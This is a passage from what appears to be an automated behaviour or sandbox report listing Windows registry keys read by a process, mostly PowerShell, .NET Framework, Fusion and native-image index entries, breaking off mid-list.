HKLM\System\CurrentControlSet\Control\Session Manager\Environment
Retrieved a handle to the HKEY_CURRENT_USER key for the user the current thread is impersonating
Registry Read
HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Default
HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server Default
HKCU\Control Panel\International sYearMonth
HKCU\Environment PSMODULEPATH
HKLM\SOFTWARE\Microsoft\Fusion NoClientChecks
HKLM\SOFTWARE\Microsoft\PowerShell\1
HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine ConsoleHostAssemblyName
HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine PowerShellVersion
HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine RuntimeVersion
HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds PipelineMaxStackSizeMB
HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN StackVersion
HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance First Counter
HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance IsMultiInstance
HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance Library

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance CategoryOptions
HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance Counter Names
HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance FileMappingSize
HKLM\Software\Microsoft\.NETFramework DisableConfigCache
HKLM\Software\Microsoft\.NETFramework InstallRoot
HKLM\Software\Microsoft\.NETFramework OnlyUseLatestCLR
HKLM\Software\Microsoft\.NETFramework UseLegacyV2RuntimeActivationPolicyDefaultValue
HKLM\Software\Microsoft\Fusion CacheLocation
HKLM\Software\Microsoft\Fusion DisableMSIPeek
HKLM\Software\Microsoft\Fusion DownloadCacheQuotaInKB
HKLM\Software\Microsoft\Fusion EnableLog
HKLM\Software\Microsoft\Fusion ForceLog
HKLM\Software\Microsoft\Fusion LogFailures
HKLM\Software\Microsoft\Fusion LogResourceBinds
HKLM\Software\Microsoft\Fusion LoggingLevel
HKLM\Software\Microsoft\Fusion NoClientChecks
HKLM\Software\Microsoft\Fusion UseLegacyIdentityFormat
HKLM\Software\Microsoft\Fusion VersioningLog
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System,2.0.0.0,,b77a5c561934e089,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Data,2.0.0.0,,b77a5c561934e089,x86
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Transactions,2.0.0.0,,b77a5c561934e089,x86
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 LatestIndex
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 Modules
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 SIG
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ConfigString
